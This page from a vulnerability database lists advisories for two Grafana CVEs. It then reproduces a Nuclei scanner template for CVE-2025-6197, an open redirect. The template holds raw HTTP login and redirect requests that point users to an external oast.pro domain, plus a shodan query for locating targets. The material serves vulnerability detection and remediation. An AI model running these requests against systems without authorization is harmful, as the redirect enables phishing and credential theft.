| Reporter | Title | Published | Views | Family All 97 |
|---|---|---|---|---|
| CVE-2025-6023 | 18 Jul 202508:15 | – | alpinelinux | |
| CVE-2025-6197 | 18 Jul 202508:15 | – | alpinelinux | |
| The vulnerability of the Grafana monitoring and observation platform, related to the lack of measures taken to protect the website structure, allows attackers to execute cross-site scripting attacks (XSS). | 23 Jul 202500:00 | – | bdu_fstec | |
| The vulnerability of the OSS Organization Switching component of the Grafana monitoring and observation platform allows a hacker to redirect users to any desired website. | 18 Aug 202500:00 | – | bdu_fstec | |
| CVE-2025-6023 vulnerabilities | 2 Jul 202614:17 | – | cgr | |
| CVE-2025-6023 | 18 Jul 202513:19 | – | circl | |
| CVE-2025-6197 | 18 Jul 202513:19 | – | circl | |
| Grafana OSS 安全漏洞 | 18 Jul 202500:00 | – | cnnvd | |
| Grafana OSS 安全漏洞 | 18 Jul 202500:00 | – | cnnvd | |
| CVE-2025-6023 | 18 Jul 202507:48 | – | cve |
id: CVE-2025-6197
info:
name: Open Redirect via Organization Switching
author: iamnoooob,pdresearch
severity: medium
description: |
An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation Multiple organizations must exist in the Grafana instance - Victim must be on a different organization than the one specified in the URL
impact: |
Authenticated attackers can redirect users to arbitrary external domains through organization switching functionality, enabling phishing attacks and credential theft.
remediation: |
Upgrade Grafana OSS to the latest version that properly validates redirect URLs in organization switching functionality.
reference:
- https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023/
- https://nvd.nist.gov/vuln/detail/CVE-2025-6197
metadata:
verified: true
max-request: 2
shodan-query: html:"grafana"
tags: cve,cve2025,redirect,grafana,open-redirect,vuln
variables:
username: "{{username}}"
password: "{{password}}"
orgid: "{{orgid}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
accept: application/json, text/plain, */*
DNT: 1
content-type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/login
Cookie: redirect_to=%2F
{"user":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Logged in'
- type: word
part: header
words:
- 'grafana_session'
- type: status
status:
- 200
- raw:
- |
GET /%2f%5coast.pro?orgId={{orgid}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
name: open-redirect
dsl:
- status_code == 302
- contains(location, '//\oast.pro?')
condition: and
# digest: 4a0a0047304502205c44308ba4d11a1345109ca4206a8dc79d55b86360d47feea0d307f469686c820221009b6aeb645ce8c3eb4a0145f2a7dc89fea7913e6bc6d63b4c95011a5b6244d689:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation